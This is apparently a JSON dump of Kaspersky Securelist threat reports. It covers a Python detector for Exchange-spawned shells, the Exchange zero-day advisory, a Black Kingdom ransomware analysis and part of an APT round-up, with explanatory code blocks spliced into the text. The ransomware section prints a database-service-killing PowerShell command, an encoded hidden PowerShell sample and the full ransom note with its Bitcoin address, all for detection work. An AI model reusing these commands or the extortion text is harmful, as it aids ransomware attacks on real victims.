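fields); PIDs, paths and the base64 blob are made up and harmless.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Exchange processes that have no business launching a shell.
# w3wp.exe is the IIS worker process hosting the Exchange web front end.
# UMWorkerProcess.exe (Unified Messaging worker) is added as an assumption.
EXCHANGE_PARENTS = {"w3wp.exe", "umworkerprocess.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# -e / -ec / -en / -enc / -encodedcommand as a standalone switch, any case
ENCODED_FLAG = re.compile(r"(?i)(?<!\S)-(?:e|ec|en|enc|encodedcommand)(?!\S)")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path as logged
    cmdline: str


@dataclass(frozen=True)
class Finding:
    pid: int
    chain: str     # e.g. "w3wp.exe > cmd.exe > powershell.exe"
    severity: str  # "high" when an encoded PowerShell command is involved


def _name(image: str) -> str:
    return ntpath.basename(image).lower()


def ancestry(pid: int, by_pid: Dict[int, ProcEvent], max_depth: int = 8) -> List[ProcEvent]:
    """[process, parent, grandparent, ...] as far as the log allows (loop-safe)."""
    chain: List[ProcEvent] = []
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen and len(chain) < max_depth:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def detect_exchange_shells(events: Iterable[ProcEvent]) -> List[Finding]:
    """Return one Finding per shell whose ancestry contains an Exchange worker."""
    by_pid = {e.pid: e for e in events}
    findings: List[Finding] = []
    for e in by_pid.values():
        if _name(e.image) not in SHELLS:
            continue
        chain = ancestry(e.pid, by_pid)
        # index of the nearest Exchange worker above this process, if any
        hit = next((i for i, p in enumerate(chain)
                    if i > 0 and _name(p.image) in EXCHANGE_PARENTS), None)
        if hit is None:
            continue
        path = " > ".join(_name(p.image) for p in reversed(chain[: hit + 1]))
        severity = "high" if ENCODED_FLAG.search(e.cmdline) else "medium"
        findings.append(Finding(e.pid, path, severity))
    return findings


# Constructed sample: w3wp.exe -> cmd.exe -> powershell.exe -enc (the
# malicious pattern) plus an unrelated interactive PowerShell under explorer.
SAMPLE_EVENTS = [
    ProcEvent(4, 0, r"C:\Windows\System32\services.exe", "services.exe"),
    ProcEvent(100, 4, r"C:\Windows\System32\inetsrv\w3wp.exe",
              'w3wp.exe -ap "MSExchangeOWAAppPool"'),
    ProcEvent(250, 100, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c powershell -nop -w hidden -enc QQBCAEMA"),
    ProcEvent(251, 250, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -nop -w hidden -enc QQBCAEMA"),
    ProcEvent(400, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(401, 400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),
]

if __name__ == "__main__":
    for f in detect_exchange_shells(SAMPLE_EVENTS):
        print(f"[{f.severity}] pid={f.pid} {f.chain}")
```

On the sample the two shells under w3wp.exe are reported (the intermediate cmd.exe and the PowerShell it launched, both high because of the -enc switch) and the interactive PowerShell under explorer.exe is not. The same walk works on real telemetry as long as the parent PID is recorded at process creation; on an Exchange server any hit of this kind warrants pulling the IIS logs for the preceding requests.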
 \n\n## How to protect against this threat?\n\nOur products protect against this threat with the [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components and detect exploitation with the verdict PDM:Exploit.Win32.Generic.\n\nWe detect the relevant exploits under the following names:\n\n * Exploit.Win32.CVE-2021-26857.gen\n * HEUR:Exploit.Win32.CVE-2021-26857.a\n\nWe also detect and block the payloads (backdoors) used in the exploitation of these vulnerabilities, according to our Threat Intelligence. Possible detection names include (but are not limited to):\n\n * HEUR:Trojan.ASP.Webshell.gen\n * HEUR:Backdoor.ASP.WebShell.gen\n * UDS:DangerousObject.Multi.Generic\n\nWe are actively monitoring the situation, and additional detection logic will be released through database updates when required.\n\nOur [Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) helps to identify attacks at an early stage by marking such suspicious actions with special IoA tags (and creating the corresponding alerts). 
The screenshot below shows one such IoA: PowerShell started by the IIS worker process (w3wp.exe) as a result of exploitation. A web server worker process spawning a shell is a strong post-exploitation signal on an Exchange server. \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/07094546/microsoft_exchange_expoit_edr.png>)\n\nOur [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service is also able to identify and stop this attack, using threat hunting rules to spot both the exploitation itself and possible payload activity.\n\nA thorough analysis of the attack will soon be available through the APT Intelligence Reporting service; please contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>) for details.\n\n## Recommendations\n\n * Microsoft has already released updates that fix all of these vulnerabilities; we strongly recommend updating Exchange Server as soon as possible.\n * Focus your defense strategy on detecting lateral movement and data exfiltration to the internet. Pay special attention to outgoing traffic in order to detect connections to attacker infrastructure. Back up data regularly and make sure you can access the backups quickly in an emergency.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and the [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service, which help to identify and stop an attack in its early stages, before the attackers achieve their goals.\n * Use a reliable endpoint security solution such as Kaspersky Endpoint Security for Business, which is powered by exploit prevention, behavior detection and a remediation engine able to roll back malicious actions. 
KESB also has self-defense mechanisms that can prevent its removal by cybercriminals.", "cvss3": {}, "published": "2021-03-04T17:20:57", "type": "securelist", "title": "Zero-day vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:20:57", "id": "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "href": "https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-17T10:31:39", "description": "\n\nBlack Kingdom ransomware appeared on the scene back in 2019, but we observed some activity again in 2021. The ransomware was deployed by an unknown adversary after exploiting a Microsoft Exchange vulnerability (CVE-2021-27065).\n\nIn complexity and sophistication, the Black Kingdom family does not bear comparison with other Ransomware-as-a-Service (RaaS) or Big Game Hunting (BGH) families. The ransomware is coded in Python and compiled to an executable using PyInstaller; it supports two encryption modes: one with a dynamically generated key and one with a hardcoded key. Code analysis revealed an amateurish development cycle and the possibility of recovering files encrypted with Black Kingdom with the help of the hardcoded key. 
The industry has already [provided a script](<https://blog.cyberint.com/black-kingdom-ransomware>) to recover files if they were encrypted with the embedded key.\n\n## Background\n\nThe use of a ransomware family dubbed Black Kingdom in a campaign that exploited the CVE-2021-27065 Microsoft Exchange vulnerability, part of the chain known as [ProxyLogon](<https://proxylogon.com/>), was [publicly reported](<https://twitter.com/vikas891/status/1373282066603859969>) at the end of March.\n\nAround the same time, we published a story on DearCry, another ransomware family deployed by attackers after successfully exploiting vulnerabilities in Microsoft Exchange Server.\n\nAnalysis of Black Kingdom revealed that, compared to other families, it is an amateurish implementation with several mistakes and a critical encryption flaw: the use of a hardcoded key that could allow the files to be decrypted. Black Kingdom is not a new player: it was observed in action following the exploitation of other vulnerabilities in 2020, such as CVE-2019-11510.\n\n**Date** | **CVE** | **Product affected** \n---|---|--- \nJune 2020 | CVE-2019-11510 | Pulse Secure \nMarch 2021 | CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 | Microsoft Exchange Server \n \n## Technical analysis\n\n### Delivery methods\n\nBlack Kingdom's past activity indicates that the ransomware was deployed as part of larger exploitation campaigns against Pulse Secure or Microsoft Exchange. [Public reports](<https://twitter.com/malwaretechblog/status/1373648027609657345>) indicated that the adversary behind the campaign, after successfully exploiting the vulnerability, installed a webshell on the compromised system. 
The webshell enabled the attacker to execute arbitrary commands, such as a PowerShell script that downloads and runs the Black Kingdom executable.\n\n### Sleep parameter\n\nExecuted without parameters, the ransomware starts encrypting the system immediately; it can also be run with a numeric argument, which it interprets as the number of seconds to wait before starting encryption.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141438/BlackKingdom_ransomware_01.png>)\n\n**_'Sleep' parameter used as an argument_**\n\n### Ransomware is written in Python\n\nBlack Kingdom is coded in Python and compiled to an executable using PyInstaller. While analyzing the code statically, we found that most of the ransomware logic is contained in a file named _0xfff.py_. The ransomware is written in Python 3.7.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141523/BlackKingdom_ransomware_02.png>)\n\n**_Black Kingdom is coded in Python_**\n\n### Excluded directories\n\nThe adversary behind Black Kingdom specified certain folders to be excluded from encryption, so as not to break the system during encryption. The list of excluded folders is available in the code:\n\n * Windows,\n * ProgramData,\n * Program Files,\n * Program Files (x86),\n * AppData/Roaming,\n * AppData/LocalLow,\n * AppData/Local.\n\nThe code that implements this functionality demonstrates how amateurishly Black Kingdom is written. 
The developers did not use environment variables or a regular expression for these paths, and instead repeated the same code twice.\n\n### PowerShell command for process termination and history deletion\n\nPrior to file encryption, Black Kingdom uses PowerShell to try to stop every service whose name contains "sql" with the following command (a common ransomware step: a running database engine keeps its files open, which would otherwise get in the way of encrypting them):\n \n \n Get-Service *sql* | Stop-Service -Force 2>$null\n\nOnce done, Black Kingdom deletes the PowerShell history on the system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141650/BlackKingdom_ransomware_03.png>)\n\n**_PowerShell commands run by Black Kingdom_**\n\nCombined with the cleanup of system logs described below, this supports the theory that the attackers try to remain hidden by removing all traces of their activity.\n\n### Encryption process\n\nStatic analysis of Black Kingdom shows how it generates an AES-256 key, following the algorithm below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141733/BlackKingdom_ransomware_04.png>)\n\n**_The pseudo-algorithm used by Black Kingdom_**\n\nThe malware generates a 64-character pseudo-random string. It then takes the MD5 hash of the string and uses it as the key for A
ES-256 encryption.\n\nThe code contains credentials for sending the generated key to the third-party service hxxp://mega.io. 
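The key scheme just described deserves a closer look, because it decides whether a victim can recover without the attacker's help. Below is an added example, not the ransomware's code: a stdlib-only Python model of the scheme as the analysis describes it (64 pseudo-random characters, MD5, an AES-256 key, upload of the key to the storage service, and a hardcoded fallback key when the upload fails). Two details are assumptions of this model rather than statements from the report: the alphabet of the random string, which the report does not give, and the use of the MD5 hex digest (32 ASCII characters) as the key, since a raw 16-byte MD5 digest could not serve as an AES-256 key. No file is encrypted and no network connection is made; the point is the effective key entropy and the fallback decision.

```python
"""Model of Black Kingdom's key handling as described in the analysis.

Added example, not the ransomware's code. Stdlib only; nothing is encrypted.
Assumptions (not from the report): the character set of the random string,
and that the MD5 *hex digest* (32 ASCII chars) is what feeds AES-256.
"""
import hashlib
import math
import secrets
import string
from typing import Callable, Tuple

ALPHABET = string.ascii_letters + string.digits  # assumption: not given on the page
HEX_DIGITS = frozenset(b"0123456789abcdef")


def generate_key_material(length: int = 64) -> str:
    """The 64-character pseudo-random string the malware starts from."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def derive_aes_key(material: str) -> bytes:
    """MD5 hex digest: 32 bytes, i.e. the right *length* for an AES-256 key."""
    return hashlib.md5(material.encode("utf-8")).hexdigest().encode("ascii")


def key_is_hex_only(key: bytes) -> bool:
    """Every key byte is one of 16 ASCII values, so each byte carries at most 4 bits."""
    return all(b in HEX_DIGITS for b in key)


def effective_key_bits(material_len: int = 64, alphabet_size: int = len(ALPHABET)) -> int:
    """Entropy that actually reaches the cipher.

    Bounded first by the random string (material_len * log2(alphabet)), then
    by MD5's 128-bit output, then by the nominal 256-bit key. With the
    report's numbers the MD5 bound wins: 'AES-256' with 128 bits of entropy.
    """
    from_material = math.floor(material_len * math.log2(alphabet_size))
    return min(from_material, 128, 256)


def select_key(generated: bytes, hardcoded: bytes,
               upload: Callable[[bytes], None]) -> Tuple[bytes, str]:
    """Mirror the fallback: the per-victim key is used only if the upload
    succeeded; otherwise the embedded key, identical for every victim."""
    try:
        upload(generated)
    except OSError:
        return hardcoded, "hardcoded"
    return generated, "dynamic"


def simulated_upload(reachable: bool) -> Callable[[bytes], None]:
    """Stand-in for the key upload to the storage service (no network I/O)."""
    def upload(_key: bytes) -> None:
        if not reachable:
            raise OSError("storage service unreachable")
    return upload


def recoverable_with_public_key(mode: str) -> bool:
    """Files can be decrypted with the known embedded key only in fallback mode."""
    return mode == "hardcoded"


if __name__ == "__main__":
    key = derive_aes_key(generate_key_material())
    print(len(key), key_is_hex_only(key), effective_key_bits())
    embedded = b"0" * 32  # placeholder, not the real embedded key
    for reachable in (True, False):
        chosen, mode = select_key(key, embedded, simulated_upload(reachable))
        print(mode, recoverable_with_public_key(mode))
```

Two practical consequences follow from the model. First, the nominal AES-256 key has 128 bits of entropy at most, and each of its 32 bytes is a hex digit, which is the fingerprint to look for when confirming that a sample uses this scheme. Second, whether a given victim is in the recoverable case is a network question: if the host could not reach the storage service at the time of encryption (for example because egress was blocked), the fallback key was used and the public decryptor applies, so proxy and firewall logs from the encryption window are worth checking during incident response.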
If the connection is unsuccessful, Black Kingdom encrypts the data with a hardcoded key available in the code.\n\nBelow is an example of a successful connection to hxxp://mega.io.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141817/BlackKingdom_ransomware_05.png>)\n\n**_Connection established with mega.io_**\n\nThe credentials for mega.io are hardcoded in Base64 and used for connecting as shown below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143025/BlackKingdom_ransomware_06.png>)\n\n**_Hardcoded credentials_**\n\nThe file sent to Mega contains the following data.\n\n**Parameter** | **Description** \n---|--- \nID | Generated ID for victim identification \nKey | Generated encryption key \nUser | Username on the infected system \nDomain | Domain to which the infected user belongs \n \nBlack Kingdom can also encrypt a single file if the file and the key to encrypt it with are passed as parameters. This allows the attacker to encrypt one file instead of the entire system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143102/BlackKingdom_ransomware_07.png>)\n\n**_Function for encrypting a single file_**\n\nIf no arguments are given, the ransomware enumerates the files on the system and encrypts them using ten threads. For each file it performs three basic operations:\n\n 1. Read the file,\n 2. Overwrite it with an encrypted version,\n 3. Rename the file.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143137/BlackKingdom_ransomware_08.png>)\n\n**_The function used for encrypting the system_**\n\nBlack Kingdom also reads a file named target.txt from its own directory: the directories listed there are walked recursively and every file found is encrypted. In addition, Black Kingdom enumerates the drive letters and encrypts those drives. 
A ransom note is dropped in each encrypted directory.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143222/BlackKingdom_ransomware_09.png>)\n\n**_Ransom note used by the ransomware_**\n\n### Encryption mistakes\n\nAmateur ransomware developers often make mistakes that either help decryption (for example, a poor implementation of key handling) or, conversely, make recovery impossible even after the victim pays for a valid decryptor. Black Kingdom tries to upload the generated key to Mega and, if this fails, uses a hardcoded key to encrypt the files. If the files were encrypted while the system was unable to connect to Mega, they can be recovered with the hardcoded key.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143256/BlackKingdom_ransomware_10.png>)\n\n**_Hardcoded key in Base64_**\n\nWhile analyzing the code statically, we examined the author's implementation of file encryption and found several mistakes that affect victims directly. During encryption, Black Kingdom does not check whether a file is already encrypted. Other popular ransomware families normally add a specific extension or a marker to every encrypted file and skip files that already carry it. As a result, if a system is infected by Black Kingdom twice, its files are encrypted twice, which may prevent recovery even with a valid key.\n\n### System log cleanup\n\nA feature of Black Kingdom is the ability to clean up system logs with a single Python function.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143334/BlackKingdom_ransomware_11.png>)\n\n**_The function that cleans up system logs_**\n\nThis operation deletes the Application, Security and System event logs. 
The purpose is to remove any history of ransomware activity, exploitation and privilege escalation.\n\n### Ransomware note\n\nWhile it encrypts files, Black Kingdom changes the desktop background to a note saying that the system is infected, and disables the mouse and keyboard with pyHook while it does so.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143409/BlackKingdom_ransomware_12.png>)\n\n**_Function to hook the mouse and keyboard_**\n\nWritten in English, the note contains several mistakes. All Black Kingdom notes contain the same Bitcoin address, which sets it apart from other ransomware families that provide a unique address to each victim.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. 
So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. 
Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nThe associated Bitcoin address is currently showing just two transactions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143451/BlackKingdom_ransomware_13.png>)\n\n**_Transactions made to a Bitcoin account_**\n\n### Code analysis\n\nAfter decompiling the Python code, we found that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on GitHub](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>).\n\nThe adversary behind Black Kingdom adapted parts of the code, adding features that were not originally present in the builder, such as the hardcoded key or communication with the mega.io domain.\n\n## Victims\n\nBased on our telemetry, we could see only a few hits by Black Kingdom in Italy and Japan.\n\n## Attribution\n\nWe could not attribute Black Kingdom to any known adversary in our case analysis. Its involvement in the Microsoft Exchange exploitation campaign suggests opportunism, rather than a resurgence in activity from this ransomware family.\n\nFor more information please contact: [financialintel@kaspersky.com](<mailto:financialintel@kaspersky.com>)\n\n## Appendix I \u2013 Indicators of Compromise\n\n**_Note:_**_ The indicators in this section were valid at the time of publication. 
Any future changes will be directly updated in the corresponding .ioc file._\n\n**File Hashes**\n\n**Domain:**\n\nhxxp://yuuuuu44[.]com/vpn-service/$(f1)/crunchyroll-vpn\n\n**YARA rules:**\n \n \n import \"hash\"\n import \"pe\"\n rule ransomware_blackkingdom {\n \n meta:\n \n description = \"Rule to detect Black Kingdom ransomware\"\n author = \"Kaspersky Lab\"\n copyright = \"Kaspersky Lab\"\n distribution = \"DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM\"\n version = \"1.0\"\n last_modified = \"2021-05-02\"\n hash = \"866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\"\n hash = \"910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\"\n \n condition:\n \n hash.sha256(pe.rich_signature.clear_data) == \"0e7d0db29c7247ae97591751d3b6c0728aed0ec1b1f853b25fc84e75ae12b7b8\"\n }\n\n## Appendix II \u2013 MITRE ATT&CK Mapping\n\nThis table contains all TTPs identified during the analysis of the activity described in this report.\n\n**Tactic** | **Technique** | **Technique Name
** \n---|---|--- \n**Execution** | **T1047** | **Windows Management Instrumentation** \n | **T1059** | **Command and Scripting Interpreter** \n | **T1106** | **Native API** \n**Persistence** | **T1574.002** | **DLL Side-Loading** \n | **T1546.011** | **Application Shimming** \n | **T1547.001** | **Registry Run Keys / Startup Folder** \n**Privilege Escalation** | **T1055** | **Process Injection** \n | **T1574.002** | **DLL Side-Loading** \n | **T1546.011** | **Application Shimming** \n | **T1134** | **Access Token Manipulation** \n | **T1547.001** | **Registry Run Keys / Startup Folder** \n**Defense Evasion** | **T1562.001** | **Disable or Modify Tools** \n | **T1140** | **Deobfuscate/Decode Files or Information** \n | **T1497** | **Virtualization/Sandbox Evasion** \n | **T1027** | **Obfuscated Files or Information** \n | **T1574.002** | **DLL Side-Loading** \n | **T1036** | **Masquerading** \n | **T1134** | **Access Token Manipulation** \n | **T1055** | **Process Injection** \n**Credential Access** | **T1056** | **Input Capture** \n**Discovery** | **T1083** | **File and Directory Discovery** \n | **T1082** | **System Information Discovery** \n | **T1497** | **Virtualization/Sandbox Evasion** \n | **T1012** | **Query Registry** \n | **T1518.001** | **Security Software Discovery** \n | **T1057** | **Process Discovery** \n | **T1018** | **Remote System Discovery** \n | **T1016** | **System Network Configuration Discovery** \n**Collection** | **T1560** | **Archive Collected Data** \n | **T1005** | **Data from Local System** \n | **T1114** | **Email Collection** \n | **T1056** | **Input Capture** \n**Command and Control** | **T1573** | **Encrypted Channel** \n**Impact** | **T1486** | **Data Encrypted for Impact**", "cvss3": {}, "published": "2021-06-17T10:00:41", "type": "securelist", "title": "Black Kingdom ransomware", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-06-17T10:00:41", "id": 
"SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "href": "https://securelist.com/black-kingdom-ransomware/102873/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-31T11:03:47", "description": "\n\n## Targeted attacks\n\n### Putting the 'A' into APT\n\nIn December, SolarWinds, a well-known IT managed services provider, fell victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised by threat actors. This resulted in the deployment of a custom backdoor, named Sunburst, on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia.\n\nOne thing that sets this campaign apart from others is the peculiar victim profiling and validation scheme. Out of the 18,000 Orion IT customers affected by the malware, it seems that only a handful were of interest to the attackers. This was a sophisticated attack that employed several methods to try to remain undetected for as long as possible. For example, before making the first internet connection to its C2s, the Sunburst malware lies dormant for up to two weeks, preventing easy detection of this behaviour in sandboxes. 
In [our initial report on Sunburst](<https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/>), we examined the method used by the malware to communicate with its C2 (command-and-control) server and the protocol used to upgrade victims for further exploitation.\n\nFurther investigation of the Sunburst backdoor revealed several [features that overlap with a previously identified backdoor known as Kazuar](<https://securelist.com/sunburst-backdoor-kazuar/99981/>), a .NET backdoor first reported in 2017 and tentatively linked to the Turla APT group.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/01/08095035/Sunburst_backdoor_Kazuar_01.png>)\n\nThe shared features between Sunburst and Kazuar include the victim UID generation algorithm, code similarities in the initial sleep algorithm and the extensive usage of the FNV1a hash to obfuscate string comparisons. There are several possibilities: Sunburst may have been developed by the same group as Kazuar; the developers of Sunburst may have adopted some ideas or code from Kazuar; both groups obtained their malware from the same source; some Kazuar developers moved to another team, taking knowledge and tools with them; or the developers of Sunburst introduced these links as a form of false flag. Hopefully, further analysis will make things clearer.\n\n### Lazarus targets the defence industry\n\nWe have observed numerous activities of the Lazarus group over many years, with the threat actor changing targets depending on its objectives. Over the last two years, we have tracked Lazarus's use of ThreatNeedle, an advanced malware cluster of Manuscrypt (aka NukeSped), to target several industries. 
While investigating [attacks on the defense industry](<https://securelist.com/lazarus-threatneedle/100803/>) in mid-2020, we were able to observe the complete life-cycle of an attack, uncovering more technical details and links to the group's other campaigns.\n\nLazarus made use of COVID-19 themes in its spear-phishing emails, embellishing them with personal information gathered using publicly available sources. Once the victim opens an infected document and agrees to enable macros, the malware is dropped onto the system and proceeds to a multi-stage deployment procedure.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07.png>)\n\nAfter gaining an initial foothold, the attackers gathered credentials and moved laterally, seeking crucial assets in the victim's environment. They overcame network segmentation by gaining access to an internal router machine and configuring it as a proxy server, allowing them to exfiltrate stolen data from the victim's intranet to their remote server.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09.png>)[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12.png>)\n\nWe have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware cluster is attributed only to the Lazarus group. 
During this investigation, we were able to find connections to several other clusters belonging to the Lazarus group.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19.png>)\n\n### MS Exchange zero-day vulnerabilities exploited in the wild\n\nOn March 2, Microsoft released [out-of-band patches for four zero-day vulnerabilities in Exchange Server](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) that are being actively exploited in the wild (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065). The vulnerabilities allow an attacker to gain access to an Exchange server, create a web shell for remote server access and steal data from the victim's network.\n\nMicrosoft attributed the attacks to a threat actor called Hafnium, although other researchers have reported that there are also [other groups exploiting the vulnerabilities to launch attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>).\n\nOur [threat intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) indicates that companies across the globe have been targeted in attacks that exploit these vulnerabilities \u2013 with the greatest focus on Europe and the US.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/04171325/microsoft_exchange_expoit_map.png>)Kaspersky products protect against this threat with [behavior-based detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [exploit prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components. We also detect and block the backdoors used in the exploitation of these vulnerabilities. 
Our EDR ([Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>)) solution helps to identify attacks in the early stages by marking suspicious actions with special IoA (Indicators of Attack) tags and by creating corresponding alerts.\n\nOur recommendations for staying safe from attacks using these vulnerabilities can be found [here](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>).\n\n### Ecipekac: sophisticated multi-layered loader discovered in A41APT campaign\n\nA41APT is a long-running campaign, active from March 2019 to the end of December 2020, that has targeted multiple industries, including Japanese manufacturing and its overseas bases. We believe, with high confidence, that the threat actor behind this campaign is APT10.\n\nOne particular piece of malware from this campaign is called Ecipekac (aka DESLoader, SigLoader, and HEAVYHAND). It is a very sophisticated multi-layer loader module used to deliver payloads such as SodaMaster, P8RAT, and FYAnti which in turn loads QuasarRAT.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/25134233/APT10_and_the_A41_APT_campaign_14.png>)The operations and implants of the campaign are remarkably stealthy, making it difficult to track the threat actor's activities. The threat actor behind the campaign implements several measures to conceal itself and make it more difficult to analyze. Most of the malware families used in the campaign are fileless malware and have not been seen before.\n\nWe believe that the most significant aspect of the Ecipekac malware is that the encrypted shellcodes are inserted into digitally signed DLLs without affecting the validity of the digital signature.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/25132856/APT10_and_the_A41_APT_campaign_05.png>)\n\nWhen this technique is used, some security solutions cannot detect these implants. 
Judging from the main features of the P8RAT and SodaMaster backdoors, we believe these modules are downloaders responsible for downloading further malware which we have so far been unable to obtain.\n\nYou can find out more about the campaign [here](<https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/>).\n\n## Other malware\n\n### Fake ad blocker, with miner included\n\nSome time ago, we discovered a number of fake applications being used to deliver a Monero crypto-currency miner to target computers. The fake programs are distributed through malicious websites that may be listed in the victim's search results. We believe this is a continuation of [a campaign last summer, reported by Avast](<https://blog.avast.com/fake-malwarebytes-installation-files-distributing-coinminer>), in which the malware masqueraded as the Malwarebytes antivirus installer. In [the latest campaign](<https://securelist.com/ad-blocker-with-miner-included/101105/>), we observed the malware impersonating several applications: the ad blockers AdShield and Netshield, as well as the OpenDNS service.\n\nOnce the victim has started the program, it changes the DNS settings on the device so that all domains are resolved through the attackers' servers: this prevents the victim from accessing certain antivirus sites. The malware then updates itself: the update also downloads and runs a modified Transmission torrent client, which sends the ID of the targeted computer, along with installation details, to the C2 server. It then downloads and installs the miner.\n\nData from Kaspersky Security Network showed that, from February 2021 until the time we published our report, there were attempts to install fake applications on the devices of more than 7,000 people. At the peak of the current campaign, more than 2,500 people were attacked each day, with most victims located in Russia and CIS countries. 
